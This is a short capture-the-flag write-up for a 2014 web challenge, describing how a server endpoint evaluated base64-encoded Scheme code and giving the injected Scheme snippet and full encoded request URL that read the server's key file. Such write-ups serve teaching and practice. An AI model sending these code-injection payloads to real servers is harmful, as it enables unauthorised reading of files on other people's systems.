Boston Key Party CTF 2014 - Web200 Writeup
The task gave a us a link to a site containng some javascript base64 stuff and jquery ones. A broken image is displayed and once you click on it the browser will make an AJAX request to /rpc(base64_encoded_stuff) . Now decoding the part of the request after ‘/rpc’ it pointed out that it is a number that will be sum’ed with ‘5’ by the server after. After a bit of testing we found out that we are dealing with the functional programming language Scheme (as hinted by the title of the chall) by submitting special chars like ‘#’ and googlin the errors that popped out. After reading the reference and the manual we tryed some code like:
( print "hi") or (* 8 8)
and they worked. So we can now take the flag just by opening the ‘key’ file:
( (call-with-input-file "./key"
(lambda (input-port)
(let loop ((x (read-char input-port)))
(if (not (eof-object? x))
(begin
(display x)
(loop (read-char input-port))))))))
http://54.218.22.41:4878/rpcKCAoY2FsbC13aXRoLWlucHV0LWZpbGUgIi4va2V5IgogIChsYW1iZGEgKGlucHV0LXBvcnQpCiAgICAobGV0IGxvb3AgKCh4IChyZWFkLWNoYXIgaW5wdXQtcG9ydCkpKQogICAgICAoaWYgKG5vdCAoZW9mLW9iamVjdD8geCkpCiAgICAgICAgICAoYmVnaW4KICAgICAgICAgICAgKGRpc3BsYXkgeCkKICAgICAgICAgICAgKGxvb3AgKHJlYWQtY2hhciBpbnB1dC1wb3J0KSkpKSkpKSk=
flag{))))))))))))))))))))))))))))))))))))}
Razor4x